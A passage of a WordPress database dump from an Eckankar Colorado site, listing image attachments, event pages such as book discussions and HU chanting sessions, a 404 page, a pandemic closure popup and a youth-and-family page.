21:36:18','','ECK_Temple_CO_021-lg','','inherit','closed','closed','','eck_temple_co_021-lg','','','2019-08-16 15:36:18','2019-08-16 21:36:18','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_021-lg.jpg',0,'attachment','image/jpeg',0),(125671,2,'2019-08-16 15:36:21','2019-08-16 21:36:21','','ECK_Temple_CO_023-A-lg','','inherit','closed','closed','','eck_temple_co_023-a-lg','','','2019-08-16 15:36:21','2019-08-16 21:36:21','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_023-A-lg.jpg',0,'attachment','image/jpeg',0),(125672,2,'2019-08-16 15:36:23','2019-08-16 21:36:23','','ECK_Temple_CO_023-lg','','inherit','closed','closed','','eck_temple_co_023-lg','','','2019-08-16 15:36:23','2019-08-16 21:36:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_023-lg.jpg',0,'attachment','image/jpeg',0),(125673,2,'2019-08-16 15:36:26','2019-08-16 21:36:26','','ECK_Temple_CO_025-lg','','inherit','closed','closed','','eck_temple_co_025-lg','','','2019-08-16 15:36:26','2019-08-16 21:36:26','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_025-lg.jpg',0,'attachment','image/jpeg',0),(125674,2,'2019-08-16 15:36:29','2019-08-16 21:36:29','','ECK_Temple_CO_026-lg','','inherit','closed','closed','','eck_temple_co_026-lg','','','2019-08-16 15:36:29','2019-08-16 21:36:29','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_026-lg.jpg',0,'attachment','image/jpeg',0),(125675,2,'2019-08-16 15:36:32','2019-08-16 21:36:32','','ECK_Temple_CO_027-lg','','inherit','closed','closed','','eck_temple_co_027-lg','','','2019-08-16 15:36:32','2019-08-16 21:36:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_027-lg.jpg',0,'attachment','image/jpeg',0),(125676,2,'2019-08-16 15:36:34','2019-08-16 21:36:34','','ECK_Temple_CO_029-lg','','inherit','closed','closed','','eck_temple_co_029-lg','','','2019-08-16 15:36:34','2019-08-16 21:36:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_029-lg.jpg',0,'attachment','image/jpeg',0),(125677,2,'2019-08-16 15:36:37','2019-08-16 21:36:37','','ECK_Temple_CO_030-lg','','inherit','closed','closed','','eck_temple_co_030-lg','','','2019-08-16 15:36:37','2019-08-16 21:36:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_030-lg.jpg',0,'attachment','image/jpeg',0),(126730,2,'2019-08-16 20:47:40','2019-08-17 02:47:40','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\" style=\"margin-top: 0px;\"><img class=\"aligncenter size-full wp-image-127458\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/404-page-pup-sorry-2.jpg\" alt=\"\" width=\"779\" height=\"478\"></p>\r\n<p class=\"\" style=\"text-align: center; font-size: 35px; margin-top: -51px; margin-bottom: -6px;\">Hmmm… looks like somebody messed up.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 29px;\">The page you requested was not found.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 29px; margin-top: -23px;\">But don\'t worry, you can always go.....</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center; padding: 0em; margin-top: -34px;\"><a class=\"btn btn-rounded btn-color-1 btn-raised bg-font-family-alt\" style=\"font-size: 29px; font-family: Rosarivo;\" href=\"https://eckankar-colorado.org/\" data-font-style=\"\">HOME</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','404 Page','','publish','closed','closed','','404-page','','','2019-09-27 11:35:54','2019-09-27 17:35:54','',0,'https://eckankar-colorado.org/?page_id=126730',0,'page','',0),(126870,2,'2019-08-16 20:33:47','2019-08-17 02:33:47','','404-page-pup-sorry','','inherit','closed','closed','','404-page-pup-sorry','','','2019-08-16 20:34:19','2019-08-17 02:34:19','',126730,'https://eckankar-colorado.org/wp-content/uploads/2019/08/404-page-pup-sorry.jpg',0,'attachment','image/jpeg',0),(127458,2,'2019-08-16 21:17:06','2019-08-17 03:17:06','','404-page-pup-sorry-2','','inherit','closed','closed','','404-page-pup-sorry-2','','','2019-08-16 21:17:06','2019-08-17 03:17:06','',126730,'https://eckankar-colorado.org/wp-content/uploads/2019/08/404-page-pup-sorry-2.jpg',0,'attachment','image/jpeg',0),(128132,2,'2019-08-17 10:53:24','2019-08-17 16:53:24','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Spiritual Laws of Life</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>Note: The discussion will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">There exist wonderful truths—spiritual laws that nourish us, one and all. Laws of wisdom, freedom, and charity, or divine love. How can we shape our lives and destiny to live in harmony with them?</span></p>\r\n<p><span style=\"font-size: 12pt;\">As awakened captains of our destiny, we can meet today’s challenges in a more relaxed and happy way. The spiritual laws of life give us the many resources to make the very best decision at any one moment.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Read Harold Klemp’s groundbreaking book. Watch a new vista of understanding open for you. You’ve not seen the likes of it. Learn how to keep in tune with your true spiritual nature. Suddenly you’re living a full, exciting life of greater love, energy, and wonder. Do you wish to open a door to the hidden spiritual truths that uplift us all? Then come along.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/The_Spiritual_Laws_of_Life-66-3.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p><strong><span style=\"font-size: 12pt;\">If you are interested in signing up for this discussion, please <span class=\"popmake-262513\"><a href=\"#\">Contact Us.</a></span></span></strong></p>','PUBLIC ECK BOOK DISCUSSION - The Spiritual Laws of Life','','publish','closed','closed','','book-discussion','','','2021-02-19 10:30:40','2021-02-19 17:30:40','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=128132',0,'tribe_events','',0),(128250,2,'2019-08-17 11:03:15','2019-08-17 17:03:15','<p><span style=\"color: #f28a27; font-size: 16pt;\">\"TBA\"</span><br />\r\nRoundtables are opportunities for sharing spiritual questions, experiences, and thoughts. The public is cordially invited to participate in this forum for exploring spiritual insights. You will be able to examine a spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy. Enjoy just listening, or feel free to share your experiences and questions in a relaxed, casual atmosphere.</p>\r\n<p>Everyone is welcome! Just drop in. Registration not necessary.</p>','Roundtable Discussion','','publish','closed','closed','','roundtable-discussion','','','2019-08-17 11:06:16','2019-08-17 17:06:16','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=128250',0,'tribe_events','',0),(128298,2,'2019-08-17 11:03:15','2019-08-17 17:03:15','<p><span style=\"color: #f28a27; font-size: 16pt;\">\"Audio Rebroadcast - Sri Harold Klemp’s 2019 Seminar Talk\"</span><br />\r\nYou are invited to attend an audio re-broadcast of the Living ECK Master\'s talk at the 2019 ECK Worldwide Seminar, held October 25 - 27 in Minneapolis, Minnesota. Harold Klemp, The Spiritual Leader of Eckankar, speaks to thousands of seekers from around the world at ECK Seminars each year. Well over a hundred audio and video recordings of his public talks are available. Author of more than sixty books, he continues to write, including many articles and spiritual-study discourses.</p>\r\n<p>Harold Klemp\'s inspiring and practical approach to spirituality helps thousands of people find greater freedom, wisdom, and love. His teachings uplift and help them recognize their own experiences in the Light and Sound of God.</p>','Audio Rebroadcast - Sri Harold Klemp’s 2019 Seminar Talk','','publish','closed','closed','','roundtable-discussion-2019-10-27','','','2019-09-29 20:12:13','2019-09-30 02:12:13','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2019-10-27#038;p=128250',0,'tribe_events','',0),(128672,2,'2019-08-17 11:12:38','2019-08-17 17:12:38','<p><span style=\"font-size: 16pt; color: #f28a27;\">\"The Secret Path to Heaven\"</span><br />\r\n-- You are invited to watch a video of a talk by the Living ECK Master -Harold Klemp. This spiritual leader of Eckankar, speaks to thousands of seekers from around the world at ECK Seminars each year. Well over a hundred audio and video recordings of his public talks are available. Author of more than sixty books, he continues to write, including many articles and spiritual-study discourses.</p>\r\n<p>Harold Klemp\'s inspiring and practical approach to spirituality helps thousands of people find greater freedom, wisdom, and love. His teachings uplift and help them recognize their own experiences in the Light and Sound of God. The video is 30 minutes long and will be followed by followed by discussion &amp; refreshments.</p>','ECK Video and Dessert Social','','publish','closed','closed','','eck-video-event-2020-03-01','','','2020-02-27 14:52:19','2020-02-27 21:52:19','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2020-03-01#038;p=128619',0,'tribe_events','',0),(128992,2,'2019-08-17 11:27:41','2019-08-17 17:27:41','<p><span style=\"color: #f28a27; font-size: 16pt;\"><strong><em>\"Wisdom of the Heart\"</em></strong> </span><span style=\"font-size: 14pt;\">Book 2—by Harold Klemp<br />\r\n</span>-- Many people have written about how the Wisdom Notes have changed their lives. \"Each letter teaches me new and practical ways to live my spiritual life to the fullest,\" says one. \"They are relevant and down-to-earth, full of practical assistance in daily life,\" says another. In this powerful collection of Wisdom Notes, Sri Harold Klemp shows how Soul’s dream to accept the full love of God in this lifetime is at the very heart of every goal we make and every challenge we face.</p>\r\n<p>Everyone is welcome! You can get the book <strong><a href=\"https://www.eckbooks.org/items/Wisdom_of_the_Heart_Book_1-97-0.html\" target=\"_blank\" rel=\"noopener noreferrer\">online</a></strong> or purchase at your local ECK Center.</p>','Wisdom of the Heart - Book Discussion','','publish','closed','closed','','book-discussion-3','','','2020-12-02 15:15:56','2020-12-02 22:15:56','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=128992',0,'tribe_events','',0),(129179,2,'2019-08-17 11:33:36','2019-08-17 17:33:36','<p><span style=\"color: #f28a27; font-size: 16pt;\">Various Spiritual Topics!  </span><br />\r\n-- Please join us each week for compelling spiritual discussions and videos by Sri Harold Klemp. Each week, we will explore a new topic like Reincarnation, Karma, Dreams, Soul Travel, and more. This discussion is open to the public. Everyone is welcome to join in the conversation or just come to listen. You will be with like-minded people in a warm and casual environment. Hope to see you there!</p>','Open Discussion - Meetup','','publish','closed','closed','','open-discussion-meetup','','','2020-12-02 15:18:01','2020-12-02 22:18:01','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=129179',0,'tribe_events','',0),(129808,2,'2019-08-17 11:45:54','2019-08-17 17:45:54','<!-- EVENT #1 -->\r\n<p><span style=\"color: #666666;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart. The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #666666;\">Divine love</span></li>\r\n	<li><span style=\"color: #666666;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #666666;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #666666;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<!-- EVENT #2 -->','Experience The Sound of Soul -- Pueblo','','publish','closed','closed','','experience-the-sound-of-soul-pueblo','','','2020-01-16 20:35:07','2020-01-17 03:35:07','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=129808',0,'tribe_events','',0),(130320,2,'2019-08-17 11:59:24','2019-08-17 17:59:24','<p><span style=\"font-size: 14pt;\"><span style=\"color: #f28a27;\"><b><em>\"The Shariyat-Ki-Sugmad\" </em></b></span>—by Paul Twitchell</span><br />\r\n-- The Shariyat-Ki-Sugmad means \"Way of the Eternal\". These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly--today. They come alive in your heart. Through The Shariyat-Ki-Sugmad you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it.</p>\r\n<p>Eckankar is ancient wisdom for today. Its teachings, which resurfaced in 1965, emphasize the value of personal experiences as the most natural way back to God. Whatever your religious background, they show how to look and listen within yourself--to expand your consciousness and enjoy spiritual connectedness. See for yourself--perhaps for the first time--how to lead a happy, balanced, and productive life. And put daily concerns into loving perspective.</p>','The Shariyat-Ki-Sugmad - Book Discussion','','publish','closed','closed','','book-discussion-5','','','2020-12-02 15:20:05','2020-12-02 22:20:05','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=130320',0,'tribe_events','',0),(131315,2,'2019-08-17 12:28:58','2019-08-17 18:28:58','<p><span style=\"font-size: 14pt; color: #f28a27;\">Vahana/Outreach Team Meeting</span></p>\r\n<p><strong>-- This Event Is For Eckankar Members --</strong></p>\r\n<p>\"There are many different ways for you to serve ECK. But whatever way you serve, choose something that you feel comfortable doing. Something that puts a light on inside you. Something that you like to do more than just about anything else. Whatever it is, use this particular means of telling others about ECK.\" —Sri Harold Klemp, <em>Wisdom of the Heart</em>, Book 2</p>\r\n<p>Vahana work comes to us as a gift that keeps on giving. All are welcome to attend and join the team. See you there!</p>','Vahana/Outreach Team Meeting','','publish','closed','closed','','vahana-outreach-team-meeting','','','2020-12-02 15:17:10','2020-12-02 22:17:10','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=131315',0,'tribe_events','',0),(132183,2,'2019-08-17 21:00:38','2019-08-18 03:00:38','','Default Theme','','publish','closed','closed','','default-theme','','','2019-08-17 21:00:38','2019-08-18 03:00:38','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=132183',0,'popup_theme','',0),(132184,2,'2019-08-17 21:00:38','2019-08-18 03:00:38','','Light Box','','publish','closed','closed','','lightbox','','','2020-12-09 08:45:25','2020-12-09 15:45:25','',0,'https://eckankar-colorado.org/?post_type=popup_theme&#038;p=132184',0,'popup_theme','',0),(132185,2,'2019-08-17 21:00:38','2019-08-18 03:00:38','','Enterprise Blue','','publish','closed','closed','','enterprise-blue','','','2019-08-17 21:00:38','2019-08-18 03:00:38','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=132185',0,'popup_theme','',0),(132186,2,'2019-08-17 21:00:38','2019-08-18 03:00:38','','Hello Box','','publish','closed','closed','','hello-box','','','2019-08-17 21:00:38','2019-08-18 03:00:38','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=132186',0,'popup_theme','',0),(132187,2,'2019-08-17 21:00:38','2019-08-18 03:00:38','','Cutting Edge','','publish','closed','closed','','cutting-edge','','','2019-08-17 21:00:38','2019-08-18 03:00:38','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=132187',0,'popup_theme','',0),(132188,2,'2019-08-17 21:00:38','2019-08-18 03:00:38','','Framed Border','','publish','closed','closed','','framed-border','','','2019-08-17 21:00:38','2019-08-18 03:00:38','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=132188',0,'popup_theme','',0),(132374,2,'2019-08-18 09:29:00','2019-08-18 15:29:00','<div style=\"text-align: center;\"><!-- \r\n\r\n\r\n\r\n\r\n\r\n<p><i class=\"fa fa-exclamation-triangle fa-3x\" style=\"color: #f28a27;\" aria-hidden=\"true\"> -->\r\n<h1 style=\"text-align: center;\"><span style=\"color: #23507d;\">ECK Events Suspended &amp; Facilities Closure</span></h1>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 13pt;\"><br />\r\nDue to the ongoing world virus concerns, all group ECK events and activities are suspended until further notice. <br />\r\n</span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 13pt;\">Closing our doors is difficult, but it is clear that the dangers of this pandemic are too great to ignore. </span><span style=\"font-size: 13pt;\">We will do our part to eliminate any chances of potential spread of the CoronaVirus. </span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 13pt;\">Going forward, we will continue to evaluate the next best steps for ECK activities and events.</span><span style=\"color: #333333; font-size: 13pt;\"><em> </em></span></p>\r\n<!--\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<div style=\"font-weight: bold; text-align: center;\">\r\n<p><i class=\"fa fa-exclamation-triangle fa-3x\" style=\"color: #f28a27;\" aria-hidden=\"true\">\r\n<h1 style=\"text-align: center;\"><span style=\"color: #f27a28;\">Event Cancellation Alert</span></h1>\r\n<p style=\"font-size: 16px; font-weight: bold; line-height: 20px; text-align: center;\"><span style=\"color: #000000;\">For The Following Colorado Eckankar Event(s) <br />\r\n</span></p>\r\n<p style=\"padding-top: 10px; font-size: 15px; font-weight: bold;\"><span style=\"color: #333333; font-size: 13pt;\"><em>LOCATION: ECK Temple of Colorado<br />\r\nEVENT: XXXXXXX<br />\r\nTIME/DATE: Day, Date, Time</em></span></p>\r\n<p style=\"font-size: 15px; text-align: center;\"><span style=\"font-size: 10pt; color: #000000;\">(To see this message again... refresh the page)</span></p>\r\n<p>--&gt;</p>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n  --></div>','Event Cancellation Popup','','draft','closed','closed','','','','','2020-03-16 19:37:08','2020-03-17 01:37:08','',0,'https://eckankar-colorado.org/?post_type=popup&#038;p=132374',0,'popup','',0),(138261,2,'2019-09-07 21:26:13','2019-09-08 03:26:13','','harold-intro','','inherit','closed','closed','','harold-intro','','','2019-09-07 21:26:13','2019-09-08 03:26:13','',7160,'https://eckankar-colorado.org/wp-content/uploads/2019/09/harold-intro.jpg',0,'attachment','image/jpeg',0),(138653,2,'2019-09-08 13:28:15','2019-09-08 19:28:15','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>','','','publish','closed','closed','','17282f16a653c991eb4e3d6f9f01f652','','','2019-09-08 13:28:15','2019-09-08 19:28:15','',0,'https://eckankar-colorado.org/17282f16a653c991eb4e3d6f9f01f652/',0,'oembed_cache','',0),(148629,2,'2019-09-09 14:04:37','2019-09-09 20:04:37','','Fubbi Quantz-2','','inherit','closed','closed','','fubbi-quantz-2','','','2019-09-09 14:04:37','2019-09-09 20:04:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Fubbi-Quantz-2.jpg',0,'attachment','image/jpeg',0),(148678,2,'2019-09-09 14:10:28','2019-09-09 20:10:28','','Gopal Das','','inherit','closed','closed','','gopal-das','','','2019-09-09 14:19:49','2019-09-09 20:19:49','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Gopal-Das.jpg',0,'attachment','image/jpeg',0),(148679,2,'2019-09-09 14:10:32','2019-09-09 20:10:32','','Kata Daki','','inherit','closed','closed','','kata-daki','','','2019-09-09 14:10:32','2019-09-09 20:10:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Kata-Daki.jpg',0,'attachment','image/jpeg',0),(148680,2,'2019-09-09 14:10:35','2019-09-09 20:10:35','','Lai Tsi','','inherit','closed','closed','','lai-tsi','','','2019-09-09 14:26:40','2019-09-09 20:26:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Lai-Tsi.jpg',0,'attachment','image/jpeg',0),(148681,2,'2019-09-09 14:10:37','2019-09-09 20:10:37','','','','inherit','closed','closed','','peddar-zaskq','','','2019-09-09 14:22:50','2019-09-09 20:22:50','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Peddar-Zaskq.jpg',0,'attachment','image/jpeg',0),(148682,2,'2019-09-09 14:10:40','2019-09-09 20:10:40','','','','inherit','closed','closed','','rami-nuri','','','2019-09-09 14:28:12','2019-09-09 20:28:12','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Rami-Nuri.jpg',0,'attachment','image/jpeg',0),(148683,2,'2019-09-09 14:10:44','2019-09-09 20:10:44','','','','inherit','closed','closed','','rebazar-tarzs','','','2019-09-09 14:26:11','2019-09-09 20:26:11','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Rebazar-Tarzs.jpg',0,'attachment','image/jpeg',0),(148684,2,'2019-09-09 14:10:47','2019-09-09 20:10:47','','','','inherit','closed','closed','','shamus-i-tabriz','','','2019-09-09 14:26:46','2019-09-09 20:26:46','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Shamus-i-Tabriz.jpg',0,'attachment','image/jpeg',0),(148685,2,'2019-09-09 14:10:51','2019-09-09 20:10:51','','','','inherit','closed','closed','','towart-managi','','','2019-09-09 14:28:19','2019-09-09 20:28:19','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Towart-Managi.jpg',0,'attachment','image/jpeg',0),(148686,2,'2019-09-09 14:10:54','2019-09-09 20:10:54','','','','inherit','closed','closed','','yaubl-sacabi','','','2019-09-09 14:28:46','2019-09-09 20:28:46','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/Yaubl-Sacabi.jpg',0,'attachment','image/jpeg',0),(151053,2,'2019-09-09 17:52:24','2019-09-09 23:52:24','<div class=\"boldgrid-section\" style=\"background-color: #eaeaea;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 60px; padding-bottom: 12px;\">\r\n<div class=\"col-md-12 col-sm-6 col-xs-12\">\r\n<h2 class=\"h1\" style=\"font-size: 40px; color: #1d5791; margin: 20px 0px; width: auto; text-align: center; text-transform: capitalize;\">Families and Youth<br>\r\nin Eckankar</h2>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<p>&nbsp;</p>\r\n<div class=\"bg-hr bg-hr-2\" style=\"width: 40%; margin-bottom: -6px; margin-top: -42px; color: #1d5791;\"></div>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"font-size: 18px; text-align: center;\">Eckankar, the Path of Spiritual Freedom, offers youth and families many exciting opportunities for spiritual discovery and understanding, including a complete spiritual study program for youth through age 17.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"background-color: #eaeaea;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 50px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-249746 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12\">\r\n<div class=\"row\" style=\"padding: 8px 0px 16px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<h2 class=\"\" style=\"text-align: left; color: #1d5791; font-size: 29px; text-transform: capitalize;\">Youth Study Programs and Resources</h2>\r\n</div>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 text-center\" style=\"text-align: left;\">\r\n<div>\r\n<p class=\"\" style=\"text-align: left; font-size: 15px;\">For more information about available classes and activities for individuals, families, and youth in Colorado, please contact the Colorado <span class=\"sg-popup-id-264285\"><a href=\"#\">Youth and Family Coordinator. </a></span></p>\r\n<h2 class=\"\" style=\"color: #1d5791; font-size: 29px; text-transform: capitalize;\">Would You Like to Know More?</h2>\r\n<p class=\"\" style=\"font-size: 15px;\">Grow spiritually as a family while you explore our<a href=\"https://www.eckbooks.org/catalog/-21-1.html\" target=\"_blank\" rel=\"noopener noreferrer\"> Youth Study Materials</a>, with spiritual exercises, tools, and values based on God’s love for all.</p>\r\n<p class=\"\" style=\"font-size: 15px;\">We invite you to explore Eckankar\'s extensive resources to help parents raise their children with the spiritual principles and teachings of ECK at<a href=\"https://ECKparents.org\" target=\"_blank\" rel=\"noopener noreferrer\"> ECKparents.org </a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Youth and Family','','publish','closed','closed','','youth-and-family','','','2021-03-30 13:36:03','2021-03-30 19:36:03','',0,'https://eckankar-colorado.org/?page_id=151053',0,'page','',0),(152442,2,'2019-09-10 15:33:37','2019-09-10 21:33:37','','harold--eck-masters-page-frame-1','','inherit','closed','closed','','harold-eck-masters-page-frame-1','','','2019-09-10 15:33:37','2019-09-10 21:33:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/harold-eck-masters-page-frame-1.jpg',0,'attachment','image/jpeg',0),(160151,2,'2019-09-20 14:31:37','2019-09-20 20:31:37','','Youth and Families','','publish','closed','closed','','160151','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=160151',17,'nav_menu_item','',0),(161672,2,'2019-09-20 21:11:55','2019-09-21 03:11:55','<p>[ninja_form id=34]</p>','Youth and Family Contact Form','','publish','closed','closed','','youth-and-family-contact-form','','','2021-03-28 14:41:20','2021-03-28 20:41:20','',0,'https://eckankar-colorado.org/?post_type=popup&#038;p=161672',0,'popup','',0),(162680,2,'2019-09-21 10:38:36','2019-09-21 16:38:36','','','','publish','closed','closed','','162680','','','2019-09-21 10:38:36','2019-09-21 16:38:36','',0,'https://eckankar-colorado.org/nf_sub/162680/',0,'nf_sub','',0),(162773,2,'2019-09-21 10:57:07','2019-09-21 16:57:07','','','','publish','closed','closed','','162773','','','2019-09-21 10:57:07','2019-09-21 16:57:07','',0,'https://eckankar-colorado.org/nf_sub/162773/',0,'nf_sub','',0),(162774,2,'2019-09-21 11:04:15','2019-09-21 17:04:15','','','','publish','closed','closed','','162774','','','2019-09-21 11:04:15','2019-09-21 17:04:15','',0,'https://eckankar-colorado.org/nf_sub/162774/',0,'nf_sub','',0),(162775,2,'2019-09-21 11:15:10','2019-09-21 17:15:10','','','','publish','closed','closed','','162775','','','2019-09-21 11:15:10','2019-09-21 17:15:10','',0,'https://eckankar-colorado.org/nf_sub/162775/',0,'nf_sub','',0),(162776,2,'2019-09-21 11:21:49','2019-09-21 17:21:49','','','','publish','closed','closed','','162776','','','2019-09-21 11:21:49','2019-09-21 17:21:49','',0,'https://eckankar-colorado.org/nf_sub/162776/',0,'nf_sub','',0),(162777,2,'2019-09-21 11:28:00','2019-09-21 17:28:00','','','','publish','closed','closed','','162777','','','2019-09-21 11:28:00','2019-09-21 17:28:00','',0,'https://eckankar-colorado.org/nf_sub/162777/',0,'nf_sub','',0),(163130,0,'2019-09-22 10:19:25','2019-09-22 16:19:25','','','','publish','closed','closed','','163130','','','2019-09-22 10:19:25','2019-09-22 16:19:25','',0,'https://eckankar-colorado.org/nf_sub/163130/',0,'nf_sub','',0),(165248,2,'2019-09-24 15:25:57','2019-09-24 21:25:57','','ECK_Temple_CO_031-lg','','inherit','closed','closed','','eck_temple_co_031-lg','','','2019-09-24 15:25:57','2019-09-24 21:25:57','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_031-lg.jpg',0,'attachment','image/jpeg',0),(165249,2,'2019-09-24 15:26:00','2019-09-24 21:26:00','','ECK_Temple_CO_032-lg','','inherit','closed','closed','','eck_temple_co_032-lg','','','2019-09-24 15:26:00','2019-09-24 21:26:00','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_032-lg.jpg',0,'attachment','image/jpeg',0),(165250,2,'2019-09-24 15:26:02','2019-09-24 21:26:02','','ECK_Temple_CO_033-lg','','inherit','closed','closed','','eck_temple_co_033-lg','','','2019-09-24 15:26:02','2019-09-24 21:26:02','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_033-lg.jpg',0,'attachment','image/jpeg',0),(165251,2,'2019-09-24 15:26:05','2019-09-24 21:26:05','','ECK_Temple_CO_034-lg','','inherit','closed','closed','','eck_temple_co_034-lg','','','2019-09-24 15:26:05','2019-09-24 21:26:05','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_034-lg.jpg',0,'attachment','image/jpeg',0),(165252,2,'2019-09-24 15:26:08','2019-09-24 21:26:08','','ECK_Temple_CO_035-lg','','inherit','closed','closed','','eck_temple_co_035-lg','','','2019-09-24 15:26:08','2019-09-24 21:26:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_035-lg.jpg',0,'attachment','image/jpeg',0),(165253,2,'2019-09-24 15:26:11','2019-09-24 21:26:11','','ECK_Temple_CO_036-lg','','inherit','closed','closed','','eck_temple_co_036-lg','','','2019-09-24 15:26:11','2019-09-24 